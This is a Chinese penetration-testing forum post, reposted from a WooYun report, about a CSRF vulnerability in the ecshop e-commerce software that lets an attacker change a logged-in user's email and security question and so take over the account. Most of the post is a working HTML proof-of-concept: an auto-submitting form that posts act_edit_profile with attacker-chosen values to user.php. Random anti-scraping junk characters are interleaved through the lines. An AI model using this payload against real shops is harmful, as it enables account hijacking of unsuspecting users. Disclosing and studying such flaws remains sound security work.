中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:# [/ R2 Q$ D. k3 p
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现1 W. ~- ?0 M' G
% u7 L' n/ A5 d: O! G* ]) n6 z
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
+ A6 h5 h5 W/ H( g- R7 F/ M6 G5 m) N& V) _9 G
详细说明:
/ [8 q8 `" c% B) j& N5 P0 i利用csrf和xss可以突破官方所说的“障碍”
9 q1 _# T2 t" x5 f( d7 X  fxss版本已经有人说明4 H& Z& \. M! k
这里给出csrf版本; G2 Y/ S* F! R+ }

' Z5 {. \; P4 x漏洞证明:# P/ ~7 O1 O; [8 d
<html>
; ]* ^# }* {- h2 W* }4 f6 z; c<body>+ B0 ?% ~' f$ B
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
0 C/ A( C$ a6 o& p; i. |<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">1 Y% J/ U9 s" F8 _& w
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
3 O1 W' r; ~1 P) Y2 F, e( G<INPUT TYPE="text" NAME="sel_question" value="ecshop">% ?& l" E! B3 X
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
# ?3 C  h3 I4 ~+ q</body>, f. W# P) W) x1 H3 l1 d  m( n
<script>
/ P5 l2 C8 D/ D  v  u. a) Z! C& gdocument.forms[0].submit();
9 m4 b; }( Y/ ?7 h6 Z3 a; @4 R</script>
) i8 X$ w& j" {' I</html>
6 e, x9 s" C4 u' L构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
; X8 J$ c* p  }% M. z# M6 I/ N+ d- X( p3 G





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2